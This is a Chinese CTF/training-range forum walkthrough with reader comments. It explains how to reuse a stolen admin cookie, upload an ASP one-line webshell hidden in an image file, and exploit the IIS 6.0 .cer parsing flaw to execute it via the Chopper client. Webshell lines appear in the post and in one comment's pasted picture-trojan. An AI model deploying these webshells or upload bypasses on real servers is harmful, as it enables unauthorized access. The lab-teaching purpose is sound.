靶场第五关解题思路--Get Shell! — 绕过防护上传木马

Track-聂风   ·   发表于 2018-05-18 19:13:03   ·   CTF&WP专版

PPT、课件已打包至附件! 

直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183187711407442&vid=f1425nhgbnh


看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。


先找到上一题打来的cookie。


ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC


然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,


把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value


(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)


然后点准备好了吗或者F5刷新页面,成功进入

然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。


我们先去百度找ASP一句话木马,因为是ASP的环境


ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。


一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了


具体的可以去http://bbs.zkaq.cn/?t/159.html 查看 然后我们成功的得到了图片马


找到上传点

我们修改产品管理里面的产品

文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式


然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。


就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。


报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。


然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。






打赏我,让我更有动力~

37 Reply   |  Until 22天前 | 43809 View

denlu026
发表于 2019-1-2

flag.txt提示没有权限,什么情况


评论列表

  • 加载数据中...

编写评论内容

black
发表于 2018-10-22

我想问下,为什么我用火狐浏览器,用burp来修改cookie,怎么一直登不上后台?

评论列表

  • 加载数据中...

编写评论内容

824097878
发表于 2018-7-14

405错误怎么办

评论列表

  • 加载数据中...

编写评论内容

豆瓣酱
发表于 2019-4-1

1.上传的0.cer文件的内容

2.上传成功后查看在服务器文件的内容,发现上传的cer文件中的一句话木马没了,不知道是变成乱码还是服务器过滤了。

3.添加完毕后 有-1值,连接时,无法连接。   过段时间-1值消失 连接还是无法连接。


以为是菜刀被杀了,关了360在社区重新下载,再次尝试,发现还是不行。希望老师们在百忙之中抽出一点时间解答一下。万分感谢哈



评论列表

  • 加载数据中...

编写评论内容

rare
发表于 2019-9-25

内容为空,flag错误。

评论列表

  • 加载数据中...

编写评论内容

郎贤坤
发表于 2021-8-15

老师,E盘怎么显示有错误啊

评论列表

  • 加载数据中...

编写评论内容

hackerboy
发表于 2022-6-21

侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 <%execute(request("pass"))%> 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍
侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍 侵浕苘醡?穤娓揊 徆b毂87拔8馾 L棿?H桯劍?酄?槍

moyu.cer的内容
还有flag。txt打不开

评论列表

  • 加载数据中...

编写评论内容

gun123456789
发表于 2022-8-18

我宣布个事啊,我是**
我用HTTPS连了半天,焯

评论列表

  • 加载数据中...

编写评论内容

runstar
发表于 8个月前

报code错误的,多测试几遍。毕竟是靶场。连的人多了就报错。上传cer应该会重新编码。但是不影响连接。我用的是蚁剑。多连接几次就能连上了。

评论列表

  • 加载数据中...

编写评论内容

成风
发表于 8个月前

flag还有就在05里面

评论列表

  • 加载数据中...

编写评论内容

tcf
发表于 2018-5-20


评论列表

  • 加载数据中...

编写评论内容

mask
发表于 2018-5-30

无论怎么改都是405错误....很奇怪

评论列表

  • 加载数据中...

编写评论内容

飞羽ceo
发表于 2018-6-4

楼主可以分享下工具吗

评论列表

  • 加载数据中...

编写评论内容

zzz
发表于 2018-6-17

老师cer编译器错误

评论列表

  • 加载数据中...

编写评论内容

tnt3t34
发表于 2018-8-2

没有菜刀怎么办,自己整个板砖?

评论列表

  • 加载数据中...

编写评论内容

poppy
发表于 2018-8-2

这是什么问题????????

评论列表

  • 加载数据中...

编写评论内容

qsc19995
发表于 2018-9-16

这是什么问题啊老师


评论列表

  • 加载数据中...

编写评论内容

小尘
发表于 2019-1-4

png和TXT文件怎么改在菜刀上都用不起

评论列表

  • 加载数据中...

编写评论内容

一止
发表于 2019-2-9

菜刀哪里有啊


评论列表

  • 加载数据中...

编写评论内容

orang_boy
发表于 2019-2-18

附件在哪

评论列表

  • 加载数据中...

编写评论内容
1 2 / 2 跳转 尾页
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.